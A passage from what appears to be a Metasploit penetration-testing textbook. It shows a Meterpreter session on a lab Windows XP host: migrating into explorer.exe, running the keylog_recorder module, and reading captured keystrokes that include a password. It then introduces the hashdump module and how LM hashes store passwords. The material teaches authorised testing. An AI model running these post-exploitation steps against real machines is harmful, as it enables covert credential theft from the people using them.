background image

82

Chapter 6

1476  spoolsv.exe          x86    0        NT AUTHORITY\SYSTEM           C:\WINDOWS\

system32\spoolsv.exe

 1668  explorer.exe       x86    0        IHAZSECURITY\Administrator    C:\WINDOWS\

Explorer.EXE

. . . SNIP . . . 

 4032  notepad.exe         x86    0        IHAZSECURITY\Administrator    C:\WINDOWS\

system32\notepad.exe

meterpreter > 

migrate 1668

 

[*] Migrating to 1668...
[*] Migration completed successfully.
meterpreter > 

run post/windows/capture/keylog_recorder 

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/loot/
20110324171334_default_192.168.1.195_host.windows.key_179703.txt
[*] Recording keystrokes...
[*] Saving last few keystrokes...

root@bt:~# 

cat /root/.msf3/loot/20110324171334_default_192.168.1.195_host.windows.key_179703.txt 

Keystroke log started at Thu Mar 24 17:13:34 -0600 2011

administrator password <Back>  <Back>  <Back>  <Back>  <Back>  <Back>  <Back>  <Tab> password123!!

Executing 

ps

 at   provides a list of running processes, including 

explorer.exe 

. At   we issue the 

migrate

 command to move our session 

into the 

explorer.exe

 process space. Once that move is complete, we start the 

keylog_recorder

 module at  , stopping it after some time with 

CTRL

-C, and 

finally, at  , in another terminal window, we dump the contents of the 
keystroke logger to see what we’ve caught.

Dumping Usernames and Passwords

In the preceding example, we grabbed password hashes by logging what a 
user typed. We can also use Meterpreter to obtain the usernames and pass-
word hashes on a local file system without the use of keyloggers.

Extracting the Password Hashes

In this attack, we’ll leverage the 

hashdump

 post exploitation module in Meter-

preter to extract the username and password hashes from the system. Microsoft 
typically stores hashes on LAN Manager (LM), NT LAN Manager (NTLM), 
and NT LAN Manager v2 (NTLMv2).

In the case of LM, for example, when a use enters a password for the first 

time or changes a password, the password is assigned a hash value. Depend-
ing on the hash value length, the password can be split into seven-character 
hashes. For example, if the password is 

password123456

, the hash value could 

be stored as 

passwor

 and 

d123456

, so an attacker would simply need to crack